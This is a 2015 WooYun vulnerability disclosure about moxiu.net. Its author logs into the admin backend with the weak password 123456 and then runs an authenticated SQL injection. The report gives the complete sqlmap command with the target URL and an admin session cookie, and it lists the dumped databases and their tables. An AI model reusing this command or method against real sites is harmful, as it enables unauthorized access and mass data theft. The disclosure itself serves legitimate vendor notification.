当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095532

漏洞标题:魔秀主题某站SQL注入可脱多个数据库系列之一

相关厂商:moxiu.com

漏洞作者: Ton7BrEak

提交时间:2015-02-10 10:23

修复时间:2015-03-27 10:24

公开时间:2015-03-27 10:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-10: 细节已通知厂商并且等待厂商处理中
2015-02-10: 厂商已经确认,细节仅向厂商公开
2015-02-20: 细节向核心白帽子及相关领域专家公开
2015-03-02: 细节向普通白帽子公开
2015-03-12: 细节向实习白帽子公开
2015-03-27: 细节向公众公开

简要描述:

公司年会抽奖提前说是“苹果牌笔记本”
一群人那个激动呀!抽奖的时候抽住的人那个激动呀!别提了!
结果你能想到么?居然是“苹果、牌、笔记本”!
看着他们的表情那是多么精彩呀!至今记忆幽深!
某站弱口令,从而方便进入后台。后台的SQL注入又让其他站沦陷。

详细说明:

001x今天看了下某IP下的C段,发现有魔秀的站点。显示的是moxiu.net。然后就用百度site:moxiu.net

001.jpg


这里是个后台 http://moxiu.net/mxadminv3/index.php?do=Login
整个页面没有验证码,也没有登录次数限制,而且有友好的报错提示,如下图

002.jpg

003.jpg


然后想了想,可以爆破。于是上burp,手动输入123456,在repeater里面没有看到报错信息,顿时出了一身冷汗,密码居然是123456

漏洞证明:

001x直接进入后台

004.jpg


002x后台管理内容挺多的,这里是后台的管理。

005.jpg


006.jpg


003x这里是官网的管理后台

007.jpg


008.jpg


004x最后一点是SQL注入,由于SQL注入地址是需要登录的,所以sqlmap使用时加上了cookie的值

sqlmap.py -u "http://moxiu.net/mxadminv3/index.php?do=Portal.MoodRec.AddRec&kid=38" --cookie="ad_auth_new=a%3A7%3A%7Bs%3A5%3A%22uname%22%3Bs%3A5%3A%22admin%22%3Bs%3A4%3A%22upwd%22%3Bs%3A32%3A%227c648f675bbab6f20b54faa536c44dbc%22%3Bs%3A8%3A%22ismodify%22%3Bs%3A1%3A%220%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%220%22%3Bs%3A6%3A%22rankid%22%3Bs%3A1%3A%227%22%3Bs%3A8%3A%22rolename%22%3Bs%3A5%3A%22admin%22%3Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3B%7D; auditime=1422951398"


004x最后跑出的数据库如下

--dbs.jpg


coop_new.jpg


Database: mx_admin
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| ad_theme_search_down | 6728953 |
| ad_feed | 846646 |
| ad_audit_record | 823094 |
| android_weather | 235744 |
| ad_user_verify | 226446 |
| ad_edmail | 194149 |
| ad_theme_digest | 53452 |
| ad_audit_allocate | 50637 |
| android_theme_home | 26797 |
| ad_theme_second | 17225 |
| ad_auth_theme | 13898 |
| ad_audit_theme | 13594 |
| android_theme_allocated | 12807 |
| ad_blog | 8468 |
| android_theme_test | 6923 |
| ad_audit_stat | 4756 |
| ad_violate_uid | 4110 |
| ad_user_blacklist | 2836 |
| ad_censor | 2300 |
| ad_log | 1988 |
| ad_theme_week | 1904 |
| android_theme_topic | 1745 |
| ad_theme_week_android | 1613 |
| ad_theme_day | 1368 |
| ad_comment | 1065 |
| ad_theme_week_symbian | 707 |
| ad_user_week | 664 |
| ad_auth_theme_audit | 524 |
| ad_stat | 487 |
| ad_inspect_stat | 463 |
| ad_commend_day | 347 |
| ad_inspect_schedule | 227 |
| android_notice | 182 |
| ad_portal_bannar | 169 |
| ad_auth_user_log | 164 |
| ad_commend_week_android | 161 |
| ad_auth_user | 157 |
| ad_commend_week_symbian | 141 |
| android_topic | 130 |
| ad_soft_package | 83 |
| mobile_cate_img | 80 |
| ad_chinamobile | 68 |
| mobile_ad | 68 |
| android_rmd_soft | 57 |
| ad_user_space | 49 |
| mobile_notice | 26 |
| mobile_search_fail | 25 |
| ad_tags | 24 |
| android_theme_reserve | 7 |
| android_home | 5 |
| ad_audit_rule | 1 |
| mobile_ad_rule | 1 |
+-------------------------+---------+


Database: mx_admin_v3
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| ad_audit_record | 20527466 |
| ad_feed | 2270858 |
| ad_log | 1777697 |
| ad_audit_record_201501_02 | 808286 |
| ad_user_verify | 476775 |
| ad_delete_theme | 226422 |
| ad_theme_second | 164761 |
| ad_audit_theme | 126600 |
| ad_theme_digest | 104015 |
| ad_user_imgs | 60041 |
| ad_auth_theme_audit | 28846 |
| ad_audit_allocate | 21298 |
| ad_auth_theme | 16282 |
| ad_audit_stat | 14391 |
| ad_auth_mood | 9199 |
| ad_auth_album | 6602 |
| ad_violate_uid | 5490 |
| ad_censor | 2323 |
| ad_comment | 1064 |
| ad_inspect_stat | 806 |
| ad_rec_mxstar | 676 |
| ad_rec_theme | 644 |
| ad_auth_log | 448 |
| ad_portal_bannar | 210 |
| ad_auth_user_log | 182 |
| ad_auth_user | 174 |
| ad_portal_albumbannar_new | 119 |
| ad_rec_mood | 70 |
| ad_tags | 60 |
| ad_admin | 48 |
| android_rmd_soft | 43 |
| ad_album_rmd | 32 |
| ad_rec_mood_gather | 29 |
| ad_portal_albumbannar | 27 |
| ad_friendlinks | 24 |
| ad_admintype | 18 |
| ad_portal_bannar_new | 14 |
| ad_bannar | 12 |
| ad_client_qqmobilebannar | 11 |
| ad_album_global_rmd | 10 |
| ad_rec_theme_gather | 2 |
| ad_audit_rule | 1 |
+---------------------------+---------+


Database: mx_blog
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| wp_commentmeta | 5084 |
| wp_comments | 2780 |
| wp_postmeta | 1901 |
| wp_yop_poll_logs | 1861 |
| wp_posts | 1674 |
| wp_options | 394 |
| wp_term_relationships | 202 |
| wp_usermeta | 127 |
| wp_term_taxonomy | 24 |
| wp_terms | 24 |
| wp_yop_poll_answers | 19 |
| wp_yop_poll_answermeta | 15 |
| wp_yop_poll_templates | 15 |
| wp_users | 6 |
| wp_yop_polls | 6 |
| wp_yop_pollmeta | 5 |
| wp_links | 4 |
+------------------------+---------+


Database: mx_tiki
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| tiki_menu_options | 387 |
| tiki_schema | 380 |
| tiki_actionlog | 243 |
| tiki_user_preferences | 131 |
| tiki_stats | 92 |
| tiki_preferences | 83 |
| tiki_category_objects | 67 |
| tiki_faq_questions | 61 |
| tiki_categorized_objects | 57 |
| tiki_faqs | 55 |
| tiki_files | 55 |
| tiki_objects | 54 |
| tiki_sefurl_regex_out | 53 |
| tiki_actionlog_conf | 49 |
| tiki_tracker_options | 43 |
| tiki_score | 30 |
| tiki_categories | 10 |
| users_grouppermissions | 7 |
| tiki_modules | 6 |
| tiki_live_support_modules | 5 |
| users_usergroups | 5 |
| users_users | 5 |
| tiki_article_types | 4 |
| tiki_menus | 4 |
| tiki_semantic_tokens | 4 |
| tiki_comments | 3 |
| tiki_file_galleries | 3 |
| tiki_history | 3 |
| tiki_integrator_rules | 3 |
| users_groups | 3 |
| tiki_live_support_operators | 2 |
| tiki_pages | 2 |
| tiki_user_postings | 2 |
| tiki_group_inclusion | 1 |
| tiki_html_pages | 1 |
| tiki_integrator_reps | 1 |
| tiki_live_support_requests | 1 |
| tiki_semaphores | 1 |
| tiki_trackers | 1 |
| tiki_user_modules | 1 |
+-----------------------------+---------+


修复方案:

弱口令修改密码,防sql注入

版权声明:转载请注明来源 Ton7BrEak@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-02-10 10:45

厂商回复:

非常感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-10 10:45 | 魔秀(乌云厂商)

    非常感谢

  2. 2015-03-27 17:36 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @魔秀 感谢吧 呵呵